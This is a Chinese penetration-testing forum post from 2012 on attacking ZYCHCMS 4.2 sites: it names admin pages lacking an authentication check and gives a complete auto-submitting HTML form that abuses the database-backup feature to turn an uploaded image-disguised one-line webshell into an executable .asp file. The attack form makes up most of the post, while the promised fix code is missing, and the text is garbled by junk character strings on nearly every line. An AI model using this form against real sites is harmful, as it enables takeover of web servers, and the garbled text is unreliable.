中国网络渗透测试联盟

标题: ZYCHCMS企业网站管理系统SQL注入漏洞及后台拿webshell [打印本页]

作者: admin    时间: 2012-9-10 21:09
标题: ZYCHCMS企业网站管理系统SQL注入漏洞及后台拿webshell

. R3 Z% j8 h, K4 G' l% E5 E1 r2 U" F5 t3 s, [5 K2 Y
: X, L; S$ |9 J' s( e. L

3 c8 m5 L/ q* G& a- E& C' R. W影响版本:ZYCHCMS企业网站管理系统4.2(存在以下两个文件的版本应该是通杀)0 T% I0 v, B4 v4 ^! H
①SQL注射漏洞' \9 u4 ^) m# c" g2 W4 c
漏洞文件:/admin/add_js.asp & /admin/add_xm_jiang.asp
, X6 o$ e  m) y  J 漏洞原因:未过滤: {- M: O! a5 x1 H2 z
漏洞代码:
( e9 H( E' x' \+ r$ S$ m0 v$ v 都是相同的,文件开头没有调用过滤文件/admin/seeion.asp,导致没有对当前权限进行判断,就直接操作数据库。! I) K0 P2 }7 Q- n
修复方法:在文件开头加入代码8 Y2 A/ t; ]1 x" B

9 @8 h4 ]5 t, H
6 U5 |+ u) w% h9 u+ n9 ]+ N7 \5 A②后台拿WBSHELL
% v3 b" F. B* s# p, U2 R+ x 进入后台有一个数据库备份,可以通过本地提交突破创建.asp后缀文件夹,并将一句话备份进去。# Y/ B6 `5 h% j
这里在网上找了一个,改了下,将就着用。
3 v, P9 N  z+ e 以下是代码本地提交代码
% a! A3 j  U* O8 u3 |& I( p $ Q: L) w7 t7 u# k7 }3 m3 g- p
6 ?4 S  F6 w: A1 w7 p& F6 j. h7 Z
<form method=”post” action=”http://localhost/admin/Manage_backup.asp?action=Backup” name=add>
! T8 b  d8 g3 G+ p- Y <!–eg:http://127.0.0.1:99/admin/Manage_backup.asp?action=Backup–>
* P+ \! d' }7 L  K <tr>
" S6 d! a( {) x8 L% [. r <td height=”30″ background=”images/bg_list.gif”><div style=”padding-left:10px; font-weight:bold; color:#FFFFFF; text-align:left”>备份数据库</div></td>
4 r7 Z/ L- p5 d" X- w  }; ]0 a; J </tr>1 w; m6 A6 }( }; r0 k) g7 ~
<tr>" }" g1 k+ T& t& w4 ^( h/ p
<td bgcolor=”#FFFFFF”><span class=”back_southidc”>/ X. S* b. c/ G+ k9 h9 c
</span>
3 U; ]. x+ f8 p4 g8 Y <table width=”100%” border=”0″ align=”center” cellpadding=”5″ cellspacing=”0″ >/ d) x) t" S5 N4 c
<tr onmouseover=”style.backgroundColor=’#EEEEEE’” onmouseout=”style.backgroundColor=’#F1F5F8′” bgcolor=”#F1F5F8″ >
$ L1 U- W; i1 n  ]4 x2 D4 T8 k/ ~ <td height=”25″ width=”30%” class=”td”><div align=”left”>当前数据库路径</div></td>/ u4 L8 |5 ]* o% |  S: x1 b' C, j
<td width=”70%” class=”td”>90sec. K5 L9 v8 S8 d
6 u9 r) E0 k) E2 z7 O% v+ G/ q$ t  U <div align=”left”>
4 N% D! M0 p$ @; K! _ <input type=”text” size=”30″ name=”DBpath” value=”此处为你在其网站上传的图片格式一句话路径” />
3 K  c, y7 R' Q) A6 n3 X" \. s5 _ <!–eg:../uploadfile/image/Logo/20120803130885328532_ZYCH.jpg>
9 ?! s" \: x, }9 O <input type=”hidden” size=”50″ name=”bkfolder” value=”123.asp” />
2 a) R1 ]; U3 Z* |" f  z </div></td>
" m0 ]' b0 ?/ C0 Z) V0 P, Z1 n </tr>% O/ [6 ^/ |: }. A" N1 g1 l/ V. b
<tr onmouseover=”style.backgroundColor=’#EEEEEE’” onmouseout=”style.backgroundColor=’#FFFFFF’” bgcolor=”#FFFFFF”>
7 O5 T# P& y# _' ]# T <td height=”25″ width=”30%” class=”td”><div align=”left”>备份数据库名称</div></td>/ a; K4 w# }1 ]  M
<td class=”td”><div align=”left”>, F4 X2 B+ k2 `- A
<input type=”text” size=”30″ name=”bkDBname” value=”4.mdb” />
3 P& [1 _+ k1 Z. d [如备份目录有该文件,将覆盖,如沒有,将自动创建]</div></td>! r* \- {; {; e; r% K5 \
</tr>
9 y3 V: A% b  ^3 v2 \& y <tr onmouseover=”style.backgroundColor=’#EEEEEE’” onmouseout=”style.backgroundColor=’#F1F5F8′” bgcolor=”#F1F5F8″>
. p. H: @9 h: {9 M2 @ <td height=”25″ width=”30%” class=”td”><div align=”left”></div></td>
) b) w- b7 ^: E% @9 D0 B- v& D4 C& Y <td class=”td”><div align=”left”>
0 a4 d/ i- S; K9 ] <input type=”submit” value=”确定备份” class=”btn”
$ Z4 L2 j5 ?& f3 a' |) h </div></td>
, }+ S* P. {# ]( g" f- L) n  \" @8 h </tr>
  Y% P' I) L; V9 F: X: S- q </table></td></tr></form>
0 Y+ h1 N3 z3 k7 X- V4 S </table>1 ]/ \# d) c# I: l0 V
</td>
/ }$ K. q6 }2 Q: s0 \; t </tr>
6 J2 r6 N! `6 W4 ~: d& b2 `5 v </table>0 A2 S1 j, d) \, S* R& y
<script>
. o9 r3 _" m  S2 c* F% c document.all.add.submit();
6 s9 B7 w8 _  ?& M& m2 E </script># t; O$ ?! ^# P. X4 K0 e" o7 K6 J

* k. ?, K2 _# `& D; q; i; X0 Z; j) h+ x$ O+ Y) [2 ^- D' X% u
0 M2 x# W. B0 |  j  X
5 E1 i/ m( G9 f  r9 }6 E& g

. |9 o+ b% p" p# \% C: h* K9 ?4 l% `# S5 M" R4 X# |3 y5 r+ K

" [0 m  U, O* {8 \- ]- C2 U
2 a% r( d9 Z8 N% E) x
3 p' O2 m' {( L6 O
) t4 h0 P, [) f5 g; G+ ]




欢迎光临 中国网络渗透测试联盟 (https://www.cobjon.com/) Powered by Discuz! X3.2